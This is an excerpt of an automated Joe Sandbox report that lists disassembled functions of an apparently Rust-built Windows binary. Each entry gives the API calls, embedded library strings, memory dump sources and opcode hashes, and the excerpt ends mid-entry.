Instruction Fuzzy Hash: 9C018B22F04A1A88FB10EBA1EA056EC6361BF41788F900435DE0D83B99EF3CE849D300

Function 00007FF63D2386C0 Relevance: 2.5, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF63D27AAE0: GetOverlappedResult.KERNEL32(?,?,-8000000000000020,-8000000000000080,00007FF63D2386D4), ref: 00007FF63D27AB21

CloseHandle.KERNEL32 ref: 00007FF63D2386D8
CloseHandle.KERNEL32 ref: 00007FF63D2386E1

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$OverlappedResult
String ID:
API String ID: 953004297-0
Opcode ID: 587d117bb2e4bd6e76d768e4040b3462c371f62b385f616c831b7967524fd2f9
Instruction ID: ff1a80855d00faf99c016be60a2f221e918f082715546c4bc41f9f3358138fac
Opcode Fuzzy Hash: 587d117bb2e4bd6e76d768e4040b3462c371f62b385f616c831b7967524fd2f9
Instruction Fuzzy Hash: 77E04F52F1454582E630E692E5415BA5220AB88B90F004030EF8E47B96AD2CE981A710

Function 00007FF63D223FE8 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoTaskMemFree.OLE32(00007FF63D224062), ref: 00007FF63D224011

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: FreeTask
String ID:
API String ID: 734271698-0
Opcode ID: 5e28ae5984b5a976e60f91431f0f2898fac32a5e4daf1d6606d5b4610ef5faf6
Instruction ID: 9f896c37e1d8ed46ed7636f60173a0bff7b73c28296b682a82cd0487d9545c14
Opcode Fuzzy Hash: 5e28ae5984b5a976e60f91431f0f2898fac32a5e4daf1d6606d5b4610ef5faf6
Instruction Fuzzy Hash: 10F08912E1869E41FB64EBA6A6513BE1251AFC4FC4F448130FF4C8BB46EE2CD653A714

Function 00007FF63D221FB8 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF63D221FF7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8fc78fedf86278d75c02b6b352e5128d65a7be319c4dde1042275700d1cc7063
Instruction ID: 746031f64b23d48b49898a2ffa49e29623036ab02a581bcece0b5579a26f3a46
Opcode Fuzzy Hash: 8fc78fedf86278d75c02b6b352e5128d65a7be319c4dde1042275700d1cc7063
Instruction Fuzzy Hash: 91F0242371475582EA00DB579A0475A6B60FB81FE0F008031EF0D47F85DE3CD592A700

Function 00007FF63D25BCB5 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF63D25BE10
CloseHandle.KERNEL32 ref: 00007FF63D25BE45

Part of subcall function 00007FF63D277000: NtWriteFile.NTDLL ref: 00007FF63D277071
Part of subcall function 00007FF63D277000: WaitForSingleObject.KERNEL32 ref: 00007FF63D277085

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$FileObjectSingleWaitWrite
String ID:
API String ID: 1197516534-0
Opcode ID: 16e3ca8d15b27be602fb32ef17f29eea0c9f65f5c4a03ae35cda9fca565b324c
Instruction ID: 5e0e9d9502a5ff0c9d7082e210a6f5fa879f1b1c7352b5d9792ef20154bcff45
Opcode Fuzzy Hash: 16e3ca8d15b27be602fb32ef17f29eea0c9f65f5c4a03ae35cda9fca565b324c
Instruction Fuzzy Hash: 3EF0E912F0D60E44BE67D3952B1177D91526F44BF5B480432EF1C87F89EE3C9492A350

Function 00007FF63D27FC75 Relevance: 1.3, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF63D2794D0: GetCurrentProcessId.KERNEL32 ref: 00007FF63D279520
Part of subcall function 00007FF63D2794D0: ProcessPrng.BCRYPTPRIMITIVES ref: 00007FF63D27954C

CloseHandle.KERNEL32 ref: 00007FF63D27FDD7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Process$CloseCurrentHandlePrng
String ID:
API String ID: 842889843-0
Opcode ID: 743e59baabb4466784b0156bb960d8ec911500a5b6d11ba07af7e199dc48940a
Instruction ID: 299290f77296e360b379e95acf53af03b37a7050a05ba13036b81466de7ac439
Opcode Fuzzy Hash: 743e59baabb4466784b0156bb960d8ec911500a5b6d11ba07af7e199dc48940a
Instruction Fuzzy Hash: F2F0303360954995E7619B65EA503AD6291EB40FECF094132DF1C87BD6EE3DE8C2E300

Non-executed Functions

Function 00007FF63D287770 Relevance: 43.2, APIs: 21, Strings: 2, Instructions: 2950COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D28957F

Strings

.debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_types, xrefs: 00007FF63D288A37
.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwolibrary\std\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 00007FF63D28B379

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID: .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_types$.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwolibrary\std\src\..\..\backtrace\src\symbolize\gimli.rs
API String ID: 3510742995-4060794284
Opcode ID: f6449bd41767d8e38f9263bfc99409af2e3e5bc0932f14e7d1cf41e54c8f9070
Instruction ID: a1f78dc1e949af8e9591a74cc7b3b19611ab095cc7069ba82062b931773c91f2
Opcode Fuzzy Hash: f6449bd41767d8e38f9263bfc99409af2e3e5bc0932f14e7d1cf41e54c8f9070
Instruction Fuzzy Hash: 56734D72A05BC988EBB08F69D9407E933A0FB4578CF504235CB4D9BB99EF389695D340

Function 00007FF63D2AFE00 Relevance: 33.5, APIs: 14, Strings: 7, Instructions: 1978COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D2B0306
memcpy.MSVCRT ref: 00007FF63D2B05D8
memcpy.MSVCRT ref: 00007FF63D2B0608
memcpy.MSVCRT ref: 00007FF63D2B0638

Strings

assertion failed: d.mant.checked_add(d.plus).is_some(), xrefs: 00007FF63D2B10DC, 00007FF63D2B1EAF
assertion failed: d.minus > 0, xrefs: 00007FF63D2B10AC, 00007FF63D2B1E7F
assertion failed: d.mant > 0, xrefs: 00007FF63D2B1094, 00007FF63D2B1E67
assertion failed: d.mant.checked_sub(d.minus).is_some(), xrefs: 00007FF63D2B10F4, 00007FF63D2B1EC7
assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_, xrefs: 00007FF63D2B1042, 00007FF63D2B1F33
assertion failed: d.plus > 0, xrefs: 00007FF63D2B10C4, 00007FF63D2B1E97
assertion failed: buf.len() >= MAX_SIG_DIGITS, xrefs: 00007FF63D2B110C

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_
API String ID: 3510742995-655871377
Opcode ID: 6ad3e98c884f90b5bc6cec442d51eed87ca75ea8e1f09b0dfe105d913faa0b30
Instruction ID: 4d003cbc7d5a7f99636c7c631fd934e7b3738ee6285dc0950aca0455616b9fd7
Opcode Fuzzy Hash: 6ad3e98c884f90b5bc6cec442d51eed87ca75ea8e1f09b0dfe105d913faa0b30
Instruction Fuzzy Hash: B3032A22A186CA4AF775CFA0DA507F92360FB56788F405235DB1E97BC5EF7CA6849300

Function 00007FF63D2AFFF0 Relevance: 23.1, APIs: 6, Strings: 9, Instructions: 585COMMON

Download Yara Rule

Strings

assertion failed: d.mant.checked_add(d.plus).is_some(), xrefs: 00007FF63D2B10DC, 00007FF63D2B1EAF, 00007FF63D2B2833
+NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 00007FF63D2B2033, 00007FF63D2B28C1
assertion failed: d.minus > 0, xrefs: 00007FF63D2B10AC, 00007FF63D2B1E7F, 00007FF63D2B2803
assertion failed: edelta >= 0library\core\src\num\diy_float.rs, xrefs: 00007FF63D2B2893
assertion failed: d.mant > 0, xrefs: 00007FF63D2B1094, 00007FF63D2B1E67, 00007FF63D2B27EB
assertion failed: d.mant + d.plus < (1 << 61), xrefs: 00007FF63D2B287B
assertion failed: d.mant.checked_sub(d.minus).is_some(), xrefs: 00007FF63D2B10F4, 00007FF63D2B1EC7, 00007FF63D2B284B
assertion failed: d.plus > 0, xrefs: 00007FF63D2B10C4, 00007FF63D2B1E97, 00007FF63D2B281B
assertion failed: buf.len() >= MAX_SIG_DIGITS, xrefs: 00007FF63D2B110C, 00007FF63D2B2863

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: +NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: edelta >= 0library\core\src\num\diy_float.rs
API String ID: 0-3544694999
Opcode ID: 79376c6c0be819ca5d3616991f86a7ced4d1cfdc7bbbdc0e5876d4f0e02be714
Instruction ID: 3648052d964561c2ba24a2c9992fd4ad2eb0dfa6b049a4405cb7084131bccc0c
Opcode Fuzzy Hash: 79376c6c0be819ca5d3616991f86a7ced4d1cfdc7bbbdc0e5876d4f0e02be714
Instruction Fuzzy Hash: D642F662E186CA8AEB31CF608B507F82360FB56788F405235DB5D57BC5EFB86695A300

Function 00007FF63D283AA0 Relevance: 21.8, APIs: 14, Instructions: 810COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a51d79f36a4b625d5daad74d693dc1564e18173d3cd8f5a3e89b05dea94e59
Instruction ID: fdcfa8eee1712b631796cc3e4efece429cdbf4bcbc41f91229f701ace067deaf
Opcode Fuzzy Hash: f0a51d79f36a4b625d5daad74d693dc1564e18173d3cd8f5a3e89b05dea94e59
Instruction Fuzzy Hash: 1A6248B2E087DA45FB318AB5D604BB96691AB01B98F444131DF6DD77D1EF3CE982A300

Function 00007FF63D2D5CE0 Relevance: 16.7, APIs: 1, Strings: 8, Instructions: 950COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF63D2D6103

Part of subcall function 00007FF63D2D7330: _assert.MSVCRT ref: 00007FF63D2D77A9

Strings

(cur_match_len >= TDEFL_MIN_MATCH_LEN) && (cur_match_dist >= 1) && (cur_match_dist <= TDEFL_LZ_DICT_SIZE), xrefs: 00007FF63D2D6BCA
max_match_len <= TDEFL_MAX_MATCH_LEN, xrefs: 00007FF63D2D64ED
d->m_lookahead_size >= len_to_move, xrefs: 00007FF63D2D6A76
lookahead_size >= cur_match_len, xrefs: 00007FF63D2D60FC
0, xrefs: 00007FF63D2D6ACB
, xrefs: 00007FF63D2D5FFC
(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE), xrefs: 00007FF63D2D67A8
miniz.c, xrefs: 00007FF63D2D60F5, 00007FF63D2D64E6, 00007FF63D2D67A1, 00007FF63D2D6A6F, 00007FF63D2D6BC3

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: _assert
String ID: $(cur_match_len >= TDEFL_MIN_MATCH_LEN) && (cur_match_dist >= 1) && (cur_match_dist <= TDEFL_LZ_DICT_SIZE)$(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)$0$d->m_lookahead_size >= len_to_move$lookahead_size >= cur_match_len$max_match_len <= TDEFL_MAX_MATCH_LEN$miniz.c
API String ID: 1222420520-709428966
Opcode ID: 04a39aedaf04f6f151b943eec858ecf83e37a50d2575af202dce6b83d8f278e9
Instruction ID: 0535c7f46ed8854437e7d15694e2437464cc6b18847e5e4d3233ccbed772b480
Opcode Fuzzy Hash: 04a39aedaf04f6f151b943eec858ecf83e37a50d2575af202dce6b83d8f278e9
Instruction Fuzzy Hash: 1992EE73A1869A8AE7A49F64C24077D37A1FF44B49F148135DB5A83788EF3DE885E700

Function 00007FF63D2740F0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 302fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D274157
memcpy.MSVCRT ref: 00007FF63D274183
memset.MSVCRT ref: 00007FF63D27429B
FindFirstFileW.KERNEL32 ref: 00007FF63D2742A6
memcpy.MSVCRT ref: 00007FF63D27430C
GetLastError.KERNEL32 ref: 00007FF63D274363
FindClose.KERNEL32 ref: 00007FF63D2744B1

Strings

*\\?\\??\:\\\.\\\path is not valid, xrefs: 00007FF63D274198

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy$Find$CloseErrorFileFirstLastmemset
String ID: *\\?\\??\:\\\.\\\path is not valid
API String ID: 3412300865-1181881060
Opcode ID: 33443f6899e1fdf60af055cc351df934df5838fda767555b26b954e47405b89d
Instruction ID: fd3f6b7d32ac1db3ca33d224b005a95f430d2734d18211e0e71587d1bba39608
Opcode Fuzzy Hash: 33443f6899e1fdf60af055cc351df934df5838fda767555b26b954e47405b89d
Instruction Fuzzy Hash: 17C1D571B1869954FB709BA19A043BD2661BF44BD8F004135DF9C8BBCAEF3DD942A300

Function 00007FF63D29D671 Relevance: 15.2, Strings: 12, Instructions: 199COMMON

Download Yara Rule

Strings

xmm1, xrefs: 00007FF63D29D6A1
xmm1, xrefs: 00007FF63D29D671
xmm3, xrefs: 00007FF63D29D84F
xmm2, xrefs: 00007FF63D29D7EB
xmm2, xrefs: 00007FF63D29D793
xmm1, xrefs: 00007FF63D29D73B
xmm2, xrefs: 00007FF63D29D767
xmm2, xrefs: 00007FF63D29D81D
xmm1, xrefs: 00007FF63D29D6CD
xmm1, xrefs: 00007FF63D29D70F
xmm2, xrefs: 00007FF63D29D7BF
mxcs, xrefs: 00007FF63D29D6F9

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: mxcs$xmm1$xmm1$xmm1$xmm1$xmm1$xmm2$xmm2$xmm2$xmm2$xmm2$xmm3
API String ID: 0-1236548232
Opcode ID: 282c2ecf0a13b10417f98fcc2de153ca1e2f6ae0caace3dd0a504f6b69fb5534
Instruction ID: c7a49135a510a4ba982aa4b2ed598ac7696bdcfac48ba9c42f2ec0d4a220883b
Opcode Fuzzy Hash: 282c2ecf0a13b10417f98fcc2de153ca1e2f6ae0caace3dd0a504f6b69fb5534
Instruction Fuzzy Hash: 1771FE22A1C0AB42E370DA755650A3D6FE2DB9AB44764D032C3498ABD8ED7FD413F760

Function 00007FF63D277170 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 293COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 00007FF63D2771A8
memset.MSVCRT ref: 00007FF63D2771D8
GetFileInformationByHandleEx.KERNEL32 ref: 00007FF63D2771EE
memcpy.MSVCRT ref: 00007FF63D277294

Strings

-pty, xrefs: 00007FF63D2775FE, 00007FF63D277633
win-, xrefs: 00007FF63D27765A
cygw, xrefs: 00007FF63D277653
msys, xrefs: 00007FF63D2775E4

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ConsoleFileHandleInformationModememcpymemset
String ID: -pty$cygw$msys$win-
API String ID: 4206110311-1440016460
Opcode ID: 5b7725837cd16be9d7651fe7001e6393701df8f01cea7ab11087e54921fc731e
Instruction ID: 869e4653f60ec6b2e4f6d2367155fbb98b4a768f42d96c50ce69bb64670ba5b0
Opcode Fuzzy Hash: 5b7725837cd16be9d7651fe7001e6393701df8f01cea7ab11087e54921fc731e
Instruction Fuzzy Hash: F7B13462B09BDA59FB708AA1CA543FA2691EB40788F544035DF1D8FBCBEE7C9541E300

Function 00007FF63D287140 Relevance: 13.8, APIs: 9, Instructions: 298fileprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF63D287204
memset.MSVCRT ref: 00007FF63D287225
Module32FirstW.KERNEL32 ref: 00007FF63D287237
Module32NextW.KERNEL32 ref: 00007FF63D2872C7
UnmapViewOfFile.KERNEL32 ref: 00007FF63D287423
CloseHandle.KERNEL32 ref: 00007FF63D28742B
UnmapViewOfFile.KERNEL32 ref: 00007FF63D2874BF
CloseHandle.KERNEL32 ref: 00007FF63D2874C7
CloseHandle.KERNEL32 ref: 00007FF63D28756D

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$FileModule32UnmapView$CreateFirstNextSnapshotToolhelp32memset
String ID:
API String ID: 2278125577-0
Opcode ID: 016300fd1fcdfac6d9336933cb7c6600dba760ac4fdae651b4ed9979cd9d6665
Instruction ID: c670bf65052561824f26541bee364f7dc9a9a0f81a77b83658f8780dc0ea8178
